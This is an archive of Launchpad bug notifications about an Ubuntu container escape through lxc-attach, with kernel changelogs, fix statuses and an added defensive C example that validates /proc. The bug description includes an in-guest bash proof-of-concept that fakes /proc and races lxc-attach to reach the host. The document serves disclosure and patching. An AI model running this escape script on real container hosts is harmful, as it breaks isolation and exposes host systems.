[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host

2016-12-06 Thread Launchpad Bug Tracker
This bug was fixed in the package linux - 4.8.0-30.32

---
linux (4.8.0-30.32) yakkety; urgency=low

  * CVE-2016-8655 (LP: #1646318)
- packet: fix race condition in packet_set_ring

 -- Brad Figg   Thu, 01 Dec 2016 08:02:53 -0800

** Changed in: linux (Ubuntu)
   Status: Triaged => Fix Released

** CVE added: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-8655

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1639345

Title:
  lxc-attach to malicious container allows access to host

Status in linux package in Ubuntu:
  Fix Released
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Released
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Released
Status in lxc source package in Yakkety:
  Fix Released

Bug description:
  A malicious root user in an unprivileged container may interfere with
  lxc-attach to provide manipulated guest proc file system information
  to disable dropping of capabilities and may in the end access the host
  file system by winning a very easy race against lxc-attach.

  In guest sequence:

  cat <<EOF > /tmp/test
  #!/bin/bash -e
  rm -rf /test || true
  mkdir -p /test/sys/kernel
  echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
  echo 0 > /test/sys/kernel/cap_last_cap
  mkdir -p /test/self
  mknod /test/self/status p
  cd /proc
  mount -o bind /test /proc
  while true; do
    pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/')
    if [ "\${pid}" != "" ]; then
      cd /
      umount -i -f -l -n /proc
      exec /LxcAttachEscape "\${pid}" /bin/bash
    fi
    sleep 1
  done
  EOF

  See attachment for LxcAttachEscape.c

  The exploit uses a fixed fd=7 for attacking; in other test environments it
  might be another fd. Tests were performed by attacking lxc-attach
  started by

  screen lxc-attach -n [guestname]

  which is the sequence required against the TTY-stealing attacks also
  not fixed in all lxc-attach versions.

  In my opinion two bugs might need fixing:
  * lxc-attach should not use untrusted/manipulated information for proceeding
  * kernel should prevent against ptracing of lxc-attach as it was created in another USERNS

  
  # lsb_release -r -d
  Description:Ubuntu 16.04.1 LTS
  Release:16.04

  # apt-cache policy lxc1
  lxc1:
Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
Version table:
     *** 2.0.5-0ubuntu1~ubuntu16.04.2 500
        500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages
        100 /var/lib/dpkg/status
     2.0.0-0ubuntu2 500
        500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
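The reporter's first point above, that lxc-attach should not act on information read from a /proc the container controls, translates into a few checks an attach tool can run before trusting that filesystem. The block below is an added illustration written for this page; it is not LXC's code and not the fix that was shipped. It assumes Linux (statfs() reporting the procfs magic 0x9fa0, openat()/mkfifoat(), a writable /tmp) and hard-codes KNOWN_CAP_LAST_CAP = 37 as the compile-time last capability of the kernel generation on this page; the scratch directory and sample cap_last_cap text it uses are constructed for the demo. The three checks mirror the three manipulated inputs in the report: the bind-mounted directory posing as /proc, the cap_last_cap of 0 that shrinks the capability-dropping loop, and the FIFO named status that stalls the reader until the attacker chooses.

```c
/* Added example (not LXC's code): checks an attach tool can run before it
 * trusts a container's /proc.  Assumes Linux: statfs(), openat(), mkfifoat(). */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/vfs.h>

#define PROC_MAGIC 0x9fa0        /* f_type procfs reports in statfs() */
#define KNOWN_CAP_LAST_CAP 37    /* assumption: CAP_AUDIT_READ, last cap in 3.16-4.x headers */

/* 1. A bind-mounted directory posing as /proc reports the magic of the
 *    filesystem it lives on, not procfs.  Returns 1 only for real procfs. */
int proc_is_trusted(const char *path)
{
    struct statfs sfs;
    if (statfs(path, &sfs) != 0)
        return 0;
    return sfs.f_type == PROC_MAGIC;
}

/* 2. Parse /proc/sys/kernel/cap_last_cap strictly: one decimal number,
 *    optional trailing whitespace, inside the 64-bit capability mask.
 *    Returns 0 on success and stores the value in *out. */
int parse_cap_last_cap(const char *text, int *out)
{
    char *end = NULL;
    errno = 0;
    long v = strtol(text, &end, 10);
    if (errno != 0 || end == text)
        return -1;
    while (*end == '\n' || *end == ' ')
        end++;
    if (*end != '\0' || v < 0 || v > 63)
        return -1;
    *out = (int)v;
    return 0;
}

/* A reported value below the compile-time constant (the report wrote 0)
 * would shrink the drop loop; never go below what the headers know about.
 * Dropping a capability the running kernel lacks just fails with EINVAL. */
int effective_cap_last_cap(int reported)
{
    return reported > KNOWN_CAP_LAST_CAP ? reported : KNOWN_CAP_LAST_CAP;
}

/* 3. Open `name` under `dirfd` only if it is a regular file.  O_NONBLOCK makes
 *    opening a FIFO return at once instead of waiting for a writer; fstat()
 *    then refuses anything that is not a plain file.  -1 and errno on refusal. */
int open_regular_at(int dirfd, const char *name)
{
    struct stat st;
    int fd = openat(dirfd, name, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        errno = EINVAL;
        return -1;
    }
    return fd;
}

/* Self-check in a constructed scratch directory: a FIFO named "status" must be
 * refused and an ordinary file named "mounts" accepted.  Returns 1 if both hold. */
int demo_fifo_rejected(void)
{
    char dir[] = "/tmp/procchk.XXXXXX";
    int ok = 0, dfd, fd;

    if (mkdtemp(dir) == NULL)
        return 0;
    dfd = open(dir, O_RDONLY | O_DIRECTORY);
    if (dfd >= 0) {
        fd = openat(dfd, "mounts", O_WRONLY | O_CREAT, 0600);
        if (fd >= 0)
            close(fd);
        if (mkfifoat(dfd, "status", 0600) == 0 &&
            open_regular_at(dfd, "status") < 0 &&
            (fd = open_regular_at(dfd, "mounts")) >= 0) {
            close(fd);
            ok = 1;
        }
        unlinkat(dfd, "status", 0);
        unlinkat(dfd, "mounts", 0);
        close(dfd);
    }
    rmdir(dir);
    return ok;
}

int main(void)
{
    int v = 0;
    const char *sample = "0\n";   /* constructed: what the report's script wrote */

    printf("/proc is procfs: %s\n", proc_is_trusted("/proc") ? "yes" : "no");
    if (parse_cap_last_cap(sample, &v) == 0)
        printf("reported cap_last_cap %d -> using %d\n", v, effective_cap_last_cap(v));
    printf("FIFO posing as status refused: %s\n", demo_fifo_rejected() ? "yes" : "no");
    return 0;
}
```

The magic check only defeats the faked directory from the report: root inside an unprivileged container can still mount a genuine procfs, whose kernel-provided values cannot be forged but whose layout the container still controls. The more robust remedy, which the checks above only approximate, is for the attach tool not to consult the container's /proc at all and to rely on a proc mount it performed itself or on the host's.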


[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host

2016-11-29 Thread Launchpad Bug Tracker
This bug was fixed in the package linux - 4.8.0-28.30

---
linux (4.8.0-28.30) yakkety; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
- LP: #1641083

  * lxc-attach to malicious container allows access to host (LP: #1639345)
- Revert "UBUNTU: SAUCE: (noup) ptrace: being capable wrt a process requires
  mapped uids/gids"
- (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission
  checks

  * [Feature] AVX-512 new instruction sets (avx512_4vnniw, avx512_4fmaps)
(LP: #1637526)
- x86/cpufeature: Add AVX512_4VNNIW and AVX512_4FMAPS features

  * zfs: importing zpool with vdev on zvol hangs kernel (LP: #1636517)
- SAUCE: (noup) Update zfs to 0.6.5.8-0ubuntu4.1

  * Move some device drivers build from kernel built-in to modules
(LP: #1637303)
- [Config] CONFIG_TIGON3=m for all arches
- [Config] CONFIG_VIRTIO_BLK=m, CONFIG_VIRTIO_NET=m

  * I2C touchpad does not work on AMD platform (LP: #1612006)
- pinctrl/amd: Configure GPIO register using BIOS settings

  * guest experiencing Transmit Timeouts on CX4 (LP: #1636330)
- powerpc/64: Re-fix race condition between going idle and entering guest
- powerpc/64: Fix race condition in setting lock bit in idle/wakeup code

  * QEMU throws failure msg while booting guest with SRIOV VF (LP: #1630554)
- KVM: PPC: Always select KVM_VFIO, plus Makefile cleanup

  * [Feature] KBL - New device ID for Kabypoint(KbP) (LP: #1591618)
- SAUCE: mfd: lpss: Fix Intel Kaby Lake PCH-H properties

  * hio: SSD data corruption under stress test (LP: #1638700)
- SAUCE: hio: set bi_error field to signal an I/O error on a BIO
- SAUCE: hio: splitting bio in the entry of .make_request_fn

  * cleanup primary tree for linux-hwe layering issues (LP: #1637473)
- [Config] switch Vcs-Git: to yakkety repository
- [Packaging] handle both linux-lts* and linux-hwe* as backports
- [Config] linux-tools-common and linux-cloud-tools-common are one per
  series
- [Config] linux-source-* is in the primary linux namespace
- [Config] linux-tools -- always suggest the base package

  * SRU: sync zfsutils-linux and spl-linux changes to linux (LP: #1635656)
- SAUCE: (noup) Update spl to 0.6.5.8-2, zfs to 0.6.5.8-0ubuntu4 (LP:
  #1635656)

  * [Feature] SKX: perf uncore PMU support (LP: #1591810)
- perf/x86/intel/uncore: Add Skylake server uncore support
- perf/x86/intel/uncore: Remove hard-coded implementation for Node ID
  mapping location
- perf/x86/intel/uncore: Handle non-standard counter offset

  * [Feature] Purley: Memory Protection Keys (LP: #1591804)
- x86/pkeys: Add fault handling for PF_PK page fault bit
- mm: Implement new pkey_mprotect() system call
- x86/pkeys: Make mprotect_key() mask off additional vm_flags
- x86/pkeys: Allocation/free syscalls
- x86: Wire up protection keys system calls
- generic syscalls: Wire up memory protection keys syscalls
- pkeys: Add details of system call use to Documentation/
- x86/pkeys: Default to a restrictive init PKRU
- x86/pkeys: Allow configuration of init_pkru
- x86/pkeys: Add self-tests

  * kernel invalid opcode in intel_powerclamp (LP: #1630774)
- SAUCE: (no-up) thermal/powerclamp: correct cpu support check

  * please include mlx5_core modules in linux-image-generic package
(LP: #1635223)
- [Config] Include mlx5 in main package

  * [LTCTest] vfio_pci not loaded on Ubuntu 16.10 by default (LP: #1636733)
- [Config] CONFIG_VFIO_PCI=y for ppc64el

  * Yakkety update to v4.8.6 stable release (LP: #1638748)
- drm/vc4: Fix races when the CS reads from render targets.
- drm/prime: Pass the right module owner through to dma_buf_export()
- drm/i915/backlight: setup and cache pwm alternate increment value
- drm/i915/backlight: setup backlight pwm alternate increment on backlight
  enable
- drm/amdgpu: fix IB alignment for UVD
- drm/amdgpu/dce10: disable hpd on local panels
- drm/amdgpu/dce8: disable hpd on local panels
- drm/amdgpu/dce11: disable hpd on local panels
- drm/amdgpu/dce11: add missing drm_mode_config_cleanup call
- drm/amdgpu: initialize the context reset_counter in amdgpu_ctx_init
- drm/amdgpu: change vblank_time's calculation method to reduce
  computational error.
- drm/radeon: narrow asic_init for virtualization
- drm/radeon/si/dpm: fix phase shedding setup
- drm/radeon: change vblank_time's calculation method to reduce
  computational error.
- drm/vmwgfx: Limit the user-space command buffer size
- drm/fsl-dcu: fix endian issue when using clk_register_divider
- drm/amd/powerplay: fix mclk not switching back after multi-head was
  disabled
- HID: add quirk for Akai MIDImix.
- drm/i915/skl: Update plane watermarks atomically during plane updates
- drm/i915: Move CRTC updating in atomic_commit into it's own hook
- drm/i915/skl: Update DDB values atomi

[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host

2016-11-29 Thread Launchpad Bug Tracker
This bug was fixed in the package linux - 4.4.0-51.72

---
linux (4.4.0-51.72) xenial; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
- LP: #1644611

  * 4.4.0-1037-snapdragon #41: kernel panic on boot (LP: #1644596)
- Revert "dma-mapping: introduce the DMA_ATTR_NO_WARN attribute"
- Revert "powerpc: implement the DMA_ATTR_NO_WARN attribute"
- Revert "nvme: use the DMA_ATTR_NO_WARN attribute"

linux (4.4.0-50.71) xenial; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
- LP: #1644169

  * xenial 4.4.0-49.70 kernel breaks LXD userspace (LP: #1644165)
- Revert "UBUNTU: SAUCE: (namespace) fuse: Allow user namespace mounts by
  default"
- Revert "UBUNTU: SAUCE: (namespace) fs: Don't remove suid for CAP_FSETID
  for userns root"
- Revert "(namespace) Revert "UBUNTU: SAUCE: fs: Don't remove suid for
  CAP_FSETID in s_user_ns""
- Revert "UBUNTU: SAUCE: (namespace) fs: Allow superblock owner to change
  ownership of inodes"
- Revert "(namespace) Revert "UBUNTU: SAUCE: fs: Allow superblock owner to
  change ownership of inodes with unmappable ids""
- Revert "UBUNTU: SAUCE: (namespace) security/integrity: Harden against
  malformed xattrs"
- Revert "(namespace) Revert "UBUNTU: SAUCE: ima/evm: Allow root in
  s_user_ns to set xattrs""
- Revert "(namespace) dquot: For now explicitly don't support filesystems
  outside of init_user_ns"
- Revert "(namespace) quota: Handle quota data stored in s_user_ns in
  quota_setxquota"
- Revert "(namespace) quota: Ensure qids map to the filesystem"
- Revert "(namespace) Revert "UBUNTU: SAUCE: quota: Convert ids relative to
  s_user_ns""
- Revert "(namespace) Revert "UBUNTU: SAUCE: quota: Require that qids passed
  to dqget() be valid and map into s_user_ns""
- Revert "(namespace) vfs: Don't create inodes with a uid or gid unknown to
  the vfs"
- Revert "(namespace) vfs: Don't modify inodes with a uid or gid unknown to
  the vfs"
- Revert "UBUNTU: SAUCE: (namespace) fuse: Translate ids in posix acl
  xattrs"
- Revert "UBUNTU: SAUCE: (namespace) posix_acl: Export
  posix_acl_fix_xattr_userns() to modules"
- Revert "(namespace) vfs: Verify acls are valid within superblock's
  s_user_ns."
- Revert "(namespace) Revert "UBUNTU: SAUCE: fs: Update posix_acl support to
  handle user namespace mounts""
- Revert "(namespace) fs: Refuse uid/gid changes which don't map into
  s_user_ns"
- Revert "(namespace) Revert "UBUNTU: SAUCE: fs: Refuse uid/gid changes
  which don't map into s_user_ns""
- Revert "(namespace) mnt: Move the FS_USERNS_MOUNT check into sget_userns"

linux (4.4.0-49.70) xenial; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
- LP: #1640921

  * Infiniband driver (kernel module) needed for Azure (LP: #1641139)
- SAUCE: RDMA Infiniband for Windows Azure
- [Config] CONFIG_HYPERV_INFINIBAND_ND=m
- SAUCE: Makefile RDMA infiniband driver for Windows Azure
- [Config] Add hv_network_direct.ko to generic inclusion list
- SAUCE: RDMA Infiniband for Windows Azure is dependent on amd64

linux (4.4.0-48.69) xenial; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
- LP: #1640758

  * lxc-attach to malicious container allows access to host (LP: #1639345)
- Revert "UBUNTU: SAUCE: (noup) ptrace: being capable wrt a process requires
  mapped uids/gids"
- (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission
  checks

  * take 'P' command from upstream xmon (LP: #1637978)
- powerpc/xmon: Add xmon command to dump process/task similar to ps(1)

  * zfs: importing zpool with vdev on zvol hangs kernel (LP: #1636517)
- SAUCE: (noup) Update zfs to 0.6.5.6-0ubuntu15

  * I2C touchpad does not work on AMD platform (LP: #1612006)
- pinctrl/amd: Configure GPIO register using BIOS settings
- pinctrl/amd: switch to using a bool for level

  * [LTCTest] vfio_pci not loaded on Ubuntu 16.10 by default (LP: #1636733)
- [Config] CONFIG_VFIO_PCI=y for ppc64el

  * QEMU throws failure msg while booting guest with SRIOV VF (LP: #1630554)
- KVM: PPC: Always select KVM_VFIO, plus Makefile cleanup

  * Allow fuse user namespace mounts by default in xenial (LP: #1634964)
- (namespace) mnt: Move the FS_USERNS_MOUNT check into sget_userns
- (namespace) Revert "UBUNTU: SAUCE: fs: Refuse uid/gid changes which don't
  map into s_user_ns"
- (namespace) fs: Refuse uid/gid changes which don't map into s_user_ns
- (namespace) Revert "UBUNTU: SAUCE: fs: Update posix_acl support to handle
  user namespace mounts"
- (namespace) vfs: Verify acls are valid within superblock's s_user_ns.
- SAUCE: (namespace) posix_acl: Export posix_acl_fix_xattr_userns() to
  modules
- SAUCE: (namespace) fuse: Translate ids in posix acl xattrs
- (namespace) vfs: Don't modify inodes with a uid or

[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host

2016-11-29 Thread Launchpad Bug Tracker
This bug was fixed in the package linux - 3.19.0-75.83

---
linux (3.19.0-75.83) vivid; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
- LP: #1640613

  * lxc-attach to malicious container allows access to host (LP: #1639345)
- Revert "UBUNTU: ptrace: being capable wrt a process requires mapped
  uids/gids"
- (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission
  checks

  * CVE-2016-8658
- brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap()

  * CVE-2016-7425
- scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer()

 -- Luis Henriques   Wed, 09 Nov 2016 22:48:56 +

** Changed in: linux (Ubuntu Vivid)
   Status: Fix Committed => Fix Released

** Changed in: linux (Ubuntu Xenial)
   Status: Fix Committed => Fix Released


Title:
  lxc-attach to malicious container allows access to host

Status in linux package in Ubuntu:
  Triaged
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Released
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Released
Status in lxc source package in Yakkety:
  Fix Released



[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host

2016-11-29 Thread Launchpad Bug Tracker
This bug was fixed in the package linux - 3.13.0-103.150

---
linux (3.13.0-103.150) trusty; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
- LP: #1644489

  * Possible regression on 3.13.0-102.149~precise1 x86_64 (gce) (LP: #1644302)
- SAUCE: apparmor: delete extra variable dev_path

linux (3.13.0-102.149) trusty; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
- LP: #1640581

  * lxc-attach to malicious container allows access to host (LP: #1639345)
- Revert "UBUNTU: ptrace: being capable wrt a process requires mapped
  uids/gids"
- (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission
  checks

  * Syntax error extra parenthesis linux-headers-3.13.0-100/Makefile
(LP: #1636625)
- Makefile: fix extra parenthesis typo when CC_STACKPROTECTOR_REGULAR is
  enabled

  * Add a driver for Amazon Elastic Network Adapters (ENA) (LP: #1635721)
- lib/bitmap.c: conversion routines to/from u32 array
- kernel.h: define u8, s8, u32, etc. limits
- net: ethtool: add new ETHTOOL_xLINKSETTINGS API
- PCI/MSI: Add pci_msix_vec_count()
- etherdevice: Use ether_addr_copy to copy an Ethernet address
- net: ena: Add a driver for Amazon Elastic Network Adapters (ENA)
- [config] enable CONFIG_ENA_ETHERNET=m (Amazon ENA driver)

  * CVE-2016-8658
- brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap()

  * CVE-2016-7425
- scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer()

  * srcname from mount rule corrupted under load (LP: #1634753)
- SAUCE: apparmor: fix sleep in critical section

  * ghash-clmulni-intel module fails to load (LP: #1633058)
- crypto: ghash-clmulni - Fix load failure
- crypto: cryptd - Assign statesize properly

 -- Luis Henriques   Thu, 24 Nov 2016 09:56:54 +

** Changed in: linux (Ubuntu Trusty)
   Status: Fix Committed => Fix Released

** CVE added: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-7425

** CVE added: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-8658


Title:
  lxc-attach to malicious container allows access to host

Status in linux package in Ubuntu:
  Triaged
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Released
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Committed
Status in lxc source package in Yakkety:
  Fix Released


[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host

2016-11-23 Thread Stéphane Graber
** Changed in: linux (Ubuntu)
   Status: Incomplete => Triaged


Title:
  lxc-attach to malicious container allows access to host

Status in linux package in Ubuntu:
  Triaged
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Committed
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Committed
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Committed
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Committed
Status in lxc source package in Yakkety:
  Fix Released



[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host

2016-11-23 Thread Stéphane Graber
** Changed in: linux (Ubuntu)
   Status: Incomplete => New

** Tags added: bot-stop-nagging


Title:
  lxc-attach to malicious container allows access to host

Status in linux package in Ubuntu:
  New
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Committed
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Committed
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Committed
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Committed
Status in lxc source package in Yakkety:
  Fix Released



[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host

2016-11-23 Thread Tyler Hicks
** Information type changed from Private Security to Public Security


Title:
  lxc-attach to malicious container allows access to host

Status in linux package in Ubuntu:
  New
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Committed
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Committed
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Committed
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Committed
Status in lxc source package in Yakkety:
  Fix Released
